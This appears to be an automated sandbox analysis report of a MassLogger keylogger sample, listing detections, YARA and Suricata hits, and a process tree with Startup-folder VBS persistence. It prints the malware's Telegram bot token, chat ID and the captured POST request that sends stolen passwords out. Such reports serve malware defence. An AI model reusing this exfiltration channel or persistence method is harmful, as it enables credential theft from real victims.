Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Analysis ID:	1664343
MD5:	2ea8899033b9757c9e88292e08b6c1a5
SHA1:	ae7168981a3e9274ec1bdc6c04c4e1650925ae0f
SHA256:	abf8078644761623df4bdd4616a35a12990ae27825d9a32a85d49098e17dba56
Tags:	exeMassLoggeruser-SecuriteInfoCom
Infos:

Detection

MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MSIL Logger

Yara detected MassLogger RAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Joe Sandbox ML detected suspicious sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe (PID: 8632 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe" MD5: 2EA8899033B9757C9E88292E08B6C1A5)

InstallUtil.exe (PID: 8764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 8952 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Persist.exe (PID: 9000 cmdline: "C:\Users\user\AppData\Roaming\Persist.exe" MD5: 2EA8899033B9757C9E88292E08B6C1A5)

InstallUtil.exe (PID: 9072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA", "Telegram Chatid": "7355061733"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2277:$a1: get_encryptedPassword 0x2583:$a2: get_encryptedUsername 0x2012:$a3: get_timePasswordChanged 0x2133:$a4: get_passwordField 0x228d:$a5: set_encryptedPassword 0x3b6e:$a7: get_logins 0x381f:$a8: GetOutlookPasswords 0x3611:$a9: StartKeylogger 0x3abe:$a10: KeyLoggerEventArgs 0x366e:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1459309358.00000000042E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1461544019.0000000005B70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1696484809.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e8f3:$a1: get_encryptedPassword 0x2ebff:$a2: get_encryptedUsername 0x2e68e:$a3: get_timePasswordChanged 0x2e7af:$a4: get_passwordField 0x2e909:$a5: set_encryptedPassword 0x301ea:$a7: get_logins 0x2fe9b:$a8: GetOutlookPasswords 0x2fc8d:$a9: StartKeylogger 0x3013a:$a10: KeyLoggerEventArgs 0x2fcea:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23263:$a1: get_encryptedPassword 0x2356f:$a2: get_encryptedUsername 0x22ffe:$a3: get_timePasswordChanged 0x2311f:$a4: get_passwordField 0x23279:$a5: set_encryptedPassword 0x24b5a:$a7: get_logins 0x2480b:$a8: GetOutlookPasswords 0x245fd:$a9: StartKeylogger 0x24aaa:$a10: KeyLoggerEventArgs 0x2465a:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbf89f:$a1: get_encryptedPassword 0xbfbab:$a2: get_encryptedUsername 0xbf63a:$a3: get_timePasswordChanged 0xbf75b:$a4: get_passwordField 0xbf8b5:$a5: set_encryptedPassword 0xc1196:$a7: get_logins 0xc0e47:$a8: GetOutlookPasswords 0xc0c39:$a9: StartKeylogger 0xc10e6:$a10: KeyLoggerEventArgs 0xc0c96:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc47b7:$a1: get_encryptedPassword 0xc4ac3:$a2: get_encryptedUsername 0xc4552:$a3: get_timePasswordChanged 0xc4673:$a4: get_passwordField 0xc47cd:$a5: set_encryptedPassword 0xc60ae:$a7: get_logins 0xc5d5f:$a8: GetOutlookPasswords 0xc5b51:$a9: StartKeylogger 0xc5ffe:$a10: KeyLoggerEventArgs 0xc5bae:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x44ef2:$a1: get_encryptedPassword 0xef36b:$a1: get_encryptedPassword 0x451ef:$a2: get_encryptedUsername 0xef63d:$a2: get_encryptedUsername 0x44ca1:$a3: get_timePasswordChanged 0xef11a:$a3: get_timePasswordChanged 0x44dc2:$a4: get_passwordField 0xef23b:$a4: get_passwordField 0x44f08:$a5: set_encryptedPassword 0xef381:$a5: set_encryptedPassword 0x46777:$a7: get_logins 0xf0b9c:$a7: get_logins 0x46428:$a8: GetOutlookPasswords 0xf084d:$a8: GetOutlookPasswords 0x4621a:$a9: StartKeylogger 0xf064c:$a9: StartKeylogger 0x466c7:$a10: KeyLoggerEventArgs 0xf0aec:$a10: KeyLoggerEventArgs 0x46277:$a11: KeyLoggerEventArgsEventHandler 0xf06a9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 8764	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 8764	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: InstallUtil.exe PID: 8764	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5fe3:$a1: get_encryptedPassword 0x62e0:$a2: get_encryptedUsername 0x5d92:$a3: get_timePasswordChanged 0x5eb3:$a4: get_passwordField 0x5ff9:$a5: set_encryptedPassword 0x7886:$a7: get_logins 0x7537:$a8: GetOutlookPasswords 0x7329:$a9: StartKeylogger 0x77d6:$a10: KeyLoggerEventArgs 0x7386:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Persist.exe PID: 9000	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Persist.exe PID: 9000	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Persist.exe PID: 9000	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Persist.exe PID: 9000	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: Persist.exe PID: 9000	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c11f:$a1: get_encryptedPassword 0x650dc:$a1: get_encryptedPassword 0x3c3f1:$a2: get_encryptedUsername 0x653d9:$a2: get_encryptedUsername 0x3bece:$a3: get_timePasswordChanged 0x64e8b:$a3: get_timePasswordChanged 0x3bfef:$a4: get_passwordField 0x64fac:$a4: get_passwordField 0x3c135:$a5: set_encryptedPassword 0x650f2:$a5: set_encryptedPassword 0x3d959:$a7: get_logins 0x66956:$a7: get_logins 0x3d60a:$a8: GetOutlookPasswords 0x66607:$a8: GetOutlookPasswords 0x3d409:$a9: StartKeylogger 0x663f9:$a9: StartKeylogger 0x3d8a9:$a10: KeyLoggerEventArgs 0x668a6:$a10: KeyLoggerEventArgs 0x3d466:$a11: KeyLoggerEventArgsEventHandler 0x66456:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 9072	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Persist.exe.3e455d0.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5b70000.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4345dd8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4305db8.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5b70000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4345dd8.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.42e5d98.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.43c55d0.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8677:$a1: get_encryptedPassword 0x8983:$a2: get_encryptedUsername 0x8412:$a3: get_timePasswordChanged 0x8533:$a4: get_passwordField 0x868d:$a5: set_encryptedPassword 0x9f6e:$a7: get_logins 0x9c1f:$a8: GetOutlookPasswords 0x9a11:$a9: StartKeylogger 0x9ebe:$a10: KeyLoggerEventArgs 0x9a6e:$a11: KeyLoggerEventArgsEventHandler
4.2.Persist.exe.2e87428.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.Persist.exe.2e87428.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
4.2.Persist.exe.2e87428.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8677:$a1: get_encryptedPassword 0x8983:$a2: get_encryptedUsername 0x8412:$a3: get_timePasswordChanged 0x8533:$a4: get_passwordField 0x868d:$a5: set_encryptedPassword 0x9f6e:$a7: get_logins 0x9c1f:$a8: GetOutlookPasswords 0x9a11:$a9: StartKeylogger 0x9ebe:$a10: KeyLoggerEventArgs 0x9a6e:$a11: KeyLoggerEventArgsEventHandler
4.2.Persist.exe.2e87428.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.Persist.exe.2e87428.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
4.2.Persist.exe.2e87428.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa477:$a1: get_encryptedPassword 0xa783:$a2: get_encryptedUsername 0xa212:$a3: get_timePasswordChanged 0xa333:$a4: get_passwordField 0xa48d:$a5: set_encryptedPassword 0xbd6e:$a7: get_logins 0xba1f:$a8: GetOutlookPasswords 0xb811:$a9: StartKeylogger 0xbcbe:$a10: KeyLoggerEventArgs 0xb86e:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa477:$a1: get_encryptedPassword 0xa783:$a2: get_encryptedUsername 0xa212:$a3: get_timePasswordChanged 0xa333:$a4: get_passwordField 0xa48d:$a5: set_encryptedPassword 0xbd6e:$a7: get_logins 0xba1f:$a8: GetOutlookPasswords 0xb811:$a9: StartKeylogger 0xbcbe:$a10: KeyLoggerEventArgs 0xb86e:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.43c55d0.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 16 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , ProcessId: 8952, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs" , ProcessId: 8952, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, ProcessId: 8632, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-14T06:26:40.962246+0200	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49695	149.154.167.220	443	TCP
2025-04-14T06:27:02.819608+0200	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49698	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-14T06:26:36.651763+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49692	193.122.6.168	80	TCP
2025-04-14T06:26:40.026733+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49692	193.122.6.168	80	TCP
2025-04-14T06:26:59.979968+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49696	193.122.6.168	80	TCP
2025-04-14T06:27:01.995632+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49696	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-14T06:26:40.564594+0200	1810008	1	Potentially Bad Traffic	192.168.2.5	49695	149.154.167.220	443	TCP
2025-04-14T06:27:02.424566+0200	1810008	1	Potentially Bad Traffic	192.168.2.5	49698	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA", "Telegram Chatid": "7355061733"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Persist.exe	ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\Persist.exe	Virustotal: Detection: 49%			Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Virustotal: Detection: 49%			Perma Link
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	ReversingLabs: Detection: 38%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 100.0%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49693 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49697 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461796927.0000000005C20000.00000004.08000000.00040000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461796927.0000000005C20000.00000004.08000000.00040000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00735761h	1_2_007354B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00736000h	1_2_00735BD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00736000h	1_2_00735F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then push 00000000h	1_2_049A2728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 049A05B9h	1_2_049A0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_049A0998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 013D5782h	5_2_013D5366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 013D51B9h	5_2_013D4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 013D5782h	5_2_013D56AF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49695 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49695 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA/sendDocument?chat_id=7355061733&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7aeb060b31fbHost: api.telegram.orgContent-Length: 1083Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA/sendDocument?chat_id=7355061733&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7aeb1321eb3fHost: api.telegram.orgContent-Length: 1097Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49692 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49696 -> 193.122.6.168:80

